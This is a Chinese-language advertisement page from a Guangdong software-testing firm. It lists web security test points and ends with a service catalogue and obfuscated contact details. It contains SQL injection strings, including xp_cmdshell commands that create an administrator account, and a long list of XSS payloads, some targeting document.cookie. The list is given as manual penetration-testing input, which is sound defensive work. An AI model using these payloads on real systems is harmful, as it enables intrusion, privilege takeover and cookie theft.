广东省软件安全性测试、渗透测试、漏洞扫描、***检查、代码审计

软件安全性测试主要包括程序、数据库安全性测试。根据系统安全指标不同测试策略也不同。

用户身份认证安全的测试要考虑问题：
1.明确区分系统中不同用户权限
2.系统中会不会出现用户冲突
3.系统会不会因用户的权限的改变造成混乱
4.用户登陆密码是否是可见、可复制
5.系统的密码策略，通常涉及到隐私，钱财或机密性的系统必须设置高可用的密码策略。
5.是否可以通过绝对途径登陆系统（拷贝用户登陆后的链接直接进入系统）
6.用户推出系统后是否删除了所有鉴权标记，是否可以使用后退键而不通过输入口令进入系统

系统网络安全的测试要考虑问题：
1.测试采取的防护措施是否正确装配好，有关系统的补丁是否打上
2.模拟非授权攻击，看防护系统是否坚固
3.采用成熟的网络漏洞检查工具检查系统相关漏洞（即用最专业的黑客攻击工具攻击试一下，现在最常用的是 NBSI系列和 IPhacker IP ）
4.采用各种木马检查工具检查系统木马情况
5.采用各种防外挂工具检查系统各组程序的客外挂漏洞

数据库安全考虑问题：
1.系统数据是否机密（比如对银行系统，这一点就特别重要，一般的网站就没有太高要求）
2.系统数据的完整性（我刚刚结束的企业实名核查服务系统中就曾存在数据的不完整，对于这个系统的功能实现有了障碍）
3.系统数据可管理性
4.系统数据的独立性
5.系统数据可备份和恢复能力（数据备份是否完整，可否恢复，恢复是否可以完整）

浏览器安全
同源策略：不同源的“document”或脚本，不能读取或者设置当前的“document”
同源定义：host（域名，或者IP），port（端口号），protocol（协议）三者一致才属于同源。
要注意的是，同源策略只是一种策略，而非实现。这个策略被用于一些特定的点来保护web的安全。
<script>,<img>,<iframe>,<link>等标签都可以跨域加载资源，不受同源策略的限制。
XMLHttpRequest，DOM，cookie受到同源策略的限制。
网站可以通过提供crossdomain.xml来允许某些源跨域访问自己的资源。
google chrome使用了多进程来隔离代码运行的环境，从而起到提高web安全的作用
Q & A
Q：cookie为什么需要同源策略？
A：cookie有同源策略是必须的，这样可以保证A网站的用户（识别）信息不会被B网站获取到
Q：XMLHttpRequest为什么需要同源策略？
A：两个例子：
(1)加入没有同源策略，某个网站的某张页面被你写入了一些js ,这些js有些ajax操作，如果某个用户访问了这张页面，你的js就可以获得用户的某些信息(cookie，本地文件等)然后通过ajax发送回你的服务器。 这就是安全问题，信息泄漏。
其实这个就是XSS攻击，为了防止XSS攻击后，用ajax请求返回用户敏感信息。但是其实XSS的攻击仅靠XMLHttpRequest的同源策略根本没用，后面的章节会看到。这也许是当时XSS还没那么丰富的时候，还算比较有效的安全策略。
（2）先假设浏览器没有限制跨域，A站的xhr请求B站的一个url，那么浏览器是要带上谁家的cookie一起请求呢？（每次http请求都要带上该站下的所有cookie）显然是B家的。假设B家的网站当前用户已经登录，那么cookie里自然记录下了sessionId相关的东西以标识当前用户的身份，那么本次xhr请求很easy的通过了身份认证，然后后果就是不堪设想的。
这个就很正确，如果A可以用xhr跨站访问B，带着B的cookie自然可以通过B网站的验证，从而获取到敏感数据。所以这点是关键。

web安全测试方法：
工具扫描
目前web安全扫描器针对OSinjection， XSS、SQL injection 、OPEN redirect 、PHP File Include漏洞的检测技术已经比较成熟。
商业软件web安全扫描器：有IBM Rational Appscan、WebInspect、Acunetix WVS 、burp suite
免费的扫描器：W3af 、Skipfish 等
根据业务资金，可以考虑购买商业扫描软件，也可以使用免费的，各有各的好处。
首页可以对网站进行大规模的扫描操作，工具扫描确认没有漏洞或者漏洞已经修复后，再进行以下手工检测。

手工检测
对于CSRF、越权访问、文件上传、修改密码 等漏洞，难以实现自动化检测的效果，这是因为这些漏洞涉及系统逻辑或业务逻辑，有时候还需要人机交互参与页面流程，
因此 这类漏洞的检测更多的需要依靠手动测试完成。

手工检测网站URL、后台登陆是否具有

SQL注入

Admin--
‘or --
‘ and ( ) exec insert * % chr mid
and 1=1 ; And 1=1 ; aNd 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49) ; %20AND%201=2
‘and 1=1 ; ‘And 1=1 ; ‘aNd 1=1 ;
and 1=2 ; ‘and 1=2
and 2=2
and user>0
and (select count(*) from sysobjects)>0
and (select count(*) from msysobjects)>0
and (Select Count(*) from Admin)>=0
and (select top 1 len(username) from Admin)>0(username 已知字段)
;exec master..xp_cmdshell “net user name password /add”—
;exec master..xp_cmdshell “net localgroup name administrators /add”—
and 0<>(select count(*) from admin)

XSS：

对于get请求的URL一般漏洞扫描软件都可扫描到是否存在XSS漏洞。（但是软件没有完美的，也有误报，或者有遗漏的情况）
对于POST的请求的（例如留言板，评论，等等），就是要在输入框输入的情况，则要进行以下测试
★~!@#$%^&*()_+<>,./?;'"[]{}\-
★%3Cinput /%3E
★%3Cscript%3Ealert('XSS')%3C/script%3E
★<input type="text"/>
★<input/>
★<input/  
★<script>alert('xss')</script>
★<script>alert('xss');</script>
★</script><script>alert(‘xss’)</script>
★javascript:alert(/xss/)
★javascript:alert(/xss/)
★<img src="#" onerror=alert(/xss/)> 
★<img src="#" style="Xss:expression(alert(/xss/));"> 
★<img src="#"/**/onerror=alert(/xss/) width=100>
★=’><script>alert(document.cookie)</script> 
★1.jpg" onmouseover="alert('xss')
★"></a><script>alert(‘xss’);</script>
★http://xxx';alert('xss');var/ a='a
★’”>xss&<
★"onmouseover=alert('hello');"
★&{alert('hello');}
  ★>"'><script>alert(‘XSS')</script>
  ★>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
★>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>
  ★AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22
  ★%22%2Balert(%27XSS%27)%2B%22
  ★<table background="javascript:alert(([code])"></table>
  ★<object type=text/html data="javascript:alert(([code]);"></object>
  ★<body onload="javascript:alert(([code])"></body>
  ★a?<script>alert(’Vulnerable’)</script>
★<!--'">&:
var from = ‘$!rundata.Parameters.getString(’from’)';
var from = ”;hackerFunction(document.cookie);”;

上面这些同样适用于GET请求
经过以上测试，如果发现输入框代码溢出，则说明可能存在XSS漏洞，说明要进行过滤.

关于越权操作的问题
例如A用户的个人资料ID为1 B用户个人资料ID为2，我通过登陆B用户，把ID修改为1 就可以查看到用户A的个人资料，这就是越权。
测试方法：通过查看URL的get参数对那些类似明显的顺序数字 进行修改，看是否能越权访问。

关于登陆安全的问题
除了SQL注入，还有找回密码功能会出现安全问题
邮箱找回密码测试方法：
先从邮箱参数修改开始，看填入用户名和自己修改的邮箱账号，看是否能收到邮箱，收到后是否能修改。
如果不能修改邮箱参数那么，我们就让它邮箱找回，接着点击邮箱内修改密码的链接，看链接的邮箱参数是否可以修改，用户名是否可以修改，加密的urlcode 是否可以逆向解密。
如果是手机找回密码功能：则测试手机收到的验证码是否是纯数字、纯字母的，如果是请修改为字母与数字的组合。

关于用开源程序的问题
关注网上你所用的开源程序的官网更新情况和安全事件。

关于上传：
1.上传文件是否有格式限制,是否可以上传exe文件；
2.上传文件是否有大小限制,上传太大的文件是否导致异常错误,上传0K的文件是否会导致异常错误,上传并不存在的文件是否会导致异常错误；
3.通过修改扩展名的方式是否可以绕过格式限制，是否可以通过压包方式绕过格式限制；
4.是否有上传空间的限制,是否可以超过空间所限制的大小,如将超过空间的大文件拆分上传是否会出现异常错误。
5.上传文件大小大于本地剩余空间大小，是否会出现异常错误。
6.关于上传是否成功的判断。上传过程中，中断。程序是否判断上传是否成功。
7.对于文件名中带有中文字符，特殊字符等的文件上传。

下载：
避免输入：\..\web.
修改命名后缀。
输入验证
客户端验证 服务器端验证(禁用脚本调试，禁用Cookies)
1.输入很大的数（如4,294,967,269），输入很小的数(负数)
2.输入超长字符,如对输入文字长度有限制,则尝试超过限制,刚好到达限制字数时有何反应
3.输入特殊字符,如:~!@#$%^&*()_+<>:”{}|
4.输入中英文空格，输入字符串中间含空格，输入首尾空格
5.输入特殊字符串NULL,null，0x0d 0x0a
6.输入正常字符串
7.输入与要求不同类型的字符，如: 要求输入数字则检查正值,负值,零值（正零，负零）,小数,字母,空值; 要求输入字母则检查输入数字
8.输入html和JavaScript代码
9.对于像回答数这样需检验数字正确性的测试点，不仅对比其与问题最终页的回答数，还要对回答进行添加删除等操作后查看变化
例如：
1.输入<html”>”gfhd</html>

2.输入<input type=”text” name=”user” onclick="alert(1)"/>,看是否出现文本框；
3.输入<script type=”text/javascript”>alert(“提示”)</script>看是否出现提示。
4.输入”><script type=”text/javascript”>alert(“提示”)</script>看是否出现提示。
5.输入 ”><script><” 看是否出现代码溢出

页面权限泄露
测试在不登陆的情况下是否可以访问到后台的页面，这个只要把后台的目录的URL全部浏览一遍即可
关于任意文件下载
查看上传的图片文件是否可以删除，如果可以删除，查看删除的URL里面的参数是否可以修改。

详细的测试点：
1.跨网站脚本攻击
通过脚本语言的缺陷模拟合法用户，控制其账户，盗窃敏感数据
2.注入攻击
通过构造查询对数据库、LDAP和其他系统进行***查询
3.恶意文件执行
在服务器上执行Shell 命令Execute，获取控制权
4.伪造跨站点请求
发起Blind 请求，模拟合法用户，要求转账等请求
5.不安全对象引用
不安全对象的引入，访问敏感文件和资源，WEB应用返回敏感文件内容
6.被破坏的认证和Session管理
验证Session token 保护措施，防止盗窃session
7.Session的失效时间限制
Session的失效时间设置是否过长，会造成访问风险
8.不安全的木马存储
过于简单的加密技术导致黑客破解编密码，隐秘信息被盗窃，验证其数据加密
9.不安全的通讯
敏感信息在不安全通道中以非加密方式传送， 敏感信息被盗窃，验证其通讯的安全性
10.URL访问限制失效
验证是否通过恶意手段访问非授权的资源链接，强行访问一些登陆网页，窃取敏感信息
11.信息泄露和不正确错误处理测试
恶意系统检测，防止黑客用获取WEB站点的具体信息的攻击手段获取详细系统信息
12.注册与登录测试
验证系统先注册后登录、验证登录用户名和密码匹配校验，密码长度及尝试登录次数，防止 ***用户登录
13.超时限制
验证WEB应用系统需要有是否超时的限制，当用户长时间不做任何操作的时候，需要重新登录才能使用
14.日志文件
验证服务器上日志是否正常工作，所有事务处理是否被记录
15.目录文件
验证WEB服务器目录访问权限，或者每个目录访问时有index.htm，防止 WEB 服务器处理不适当，将整个WEB目录暴露
16.身份验证
验证调用者身份、数据库身份、验证是否明确服务账户要求、是否强制式试用账户管理措施
17.授权
验证如何向最终用户授权、如何在数据库中授权应用程序，确定访问系统资源权限
18.会话
验证如何交换会话标识符、是否限制会话生存期、如何确保会话存储状态安全
19.配置管理
验证是否支持远程管理、是否保证配置存储安全、是否隔离管理员特权
20.备份与恢复
为了防止系统意外崩溃造成的数据丢失，验证备份与恢复功能正常实现、备份与恢复方式是否满足Web系统安全性要求
21.数据库关键数据是否进行加密存储，是否在网络中传递敏感数据
22.在登录或注册功能中是否有验证码存在，防止恶意大批量注册登录的攻击
23.Cookie文件是否进行了加密存储，防止盗用cookie内容
24.密码强度提醒
建议对密码的规则进行加强设置
25.密码内容禁止拷贝粘贴

服务区域：广东省、广州(天河、萝岗开发区、黄埔开发区、南沙新区、番禺、花都、从化、增城、越秀、白云）、珠海市、中山市、江门市、佛山市、惠州市、东莞市、深圳市、肇庆市、云浮市、茂名市、湛江市、清远市、韶关市、梅州市、汕头市、潮州市、河源市、揭阳市、阳江市

全国各省、市、自治区：广东省、海南省、福建省、湖南省、四川省、重庆市、贵州省、云南省、广西壮族自治区、湖北省、河南省、山东省、河北省、陕西省、山西省、浙江省、江苏省、辽宁省、黑龙江省、吉林省、上海市、天津市、北京市、甘肃省、西藏自治区、安徽省、青海省、宁夏回族自治区、内蒙古自治区、新疆维吾尔族自治区

WX:一三三+++++四二捌伍++++++二伍一捌

主要业务为软件产品测试、电子产品检测、安防产品检测、软件第三方验收测试、科技项目验收测试、信息系统第三方检测、集成电路检测、芯片检测、IC检测、雷电防护装置检测（建筑防雷装置检测、防雷定期检测、防雷首次检测）、通信网防御雷电安全保护检测、移动通信基站防雷检测、地理信息系统软件测试、数字社区应用软件测评、 建设领域软硬件测评、软件安全性测试、软件验收项目（安全、性能、验收测试、渗透测试、漏洞扫描、***检查、代码审计）、广东省安全技术防范系统设计、施工、维修资格备案证业绩检测（安防工程检测）、信息化项目技术绩效评估(网站或系统绩效评估）、政务信息化项目效能评估、信息系统安全等级保护备案证明、信息系统安全等保报告、网络安全等保测评、信息系统安全等保测评、数字新基建项目第三方测试(5G建设、特高压、城际高速铁路和城市轨道交通、新能源汽车充电桩、大数据中心、人工能、工业互联网)、广东省守合同重企业、通用航空经营许可（即原来的：民用无人驾驶航空器经营许可、道路运输经营许可、AOPA无人机多旋翼驾驶员培训、无人机研发生产销售、无人机合作办学、无人机实训室建设、信息系统建设和服务能力评估CS、信息系统服务交付能力评估CCID、计算机信息系统安全服务证、信息系统集成及服务资质、信息系统运维资质、音视频系统集成资质、安防系统集成资质、音视频集成工程企业能力等级证书、信息化能力评价、EDI/ICP安全防护检测、广东省安全技术防范系统设计、施工与维修证、广东省有线广播电视工程设计（安装）证、广东省防雷工程企业能力评价、软件过程及能力成熟度评估CMMI、涉密信息系统集成资质、数据管理能力成熟度评估模型DCMM、信息技术服务运行维护标准ITSS、信息安全服务资质CCRC、科技成果评价、科技成果登记、科技成果登记合作（即挂名）、科学技术奖申请、专利合作申请（即挂名）、国家高新技术企业认证、双软认定、动漫企业认定、技术合同登记、知识产权服务、发明专利加急、集成电路布图专有权登记、计算机软件著作权登记、软件检测报告（软件项目验收鉴定报告）、工商注册、代理记账、创业补助申请等服务领域。VX;133-------4二捌五----2518

如有计划办的企业，可协助解决企业人员问题，可咨询我们，v---x：133----四二捌五----2518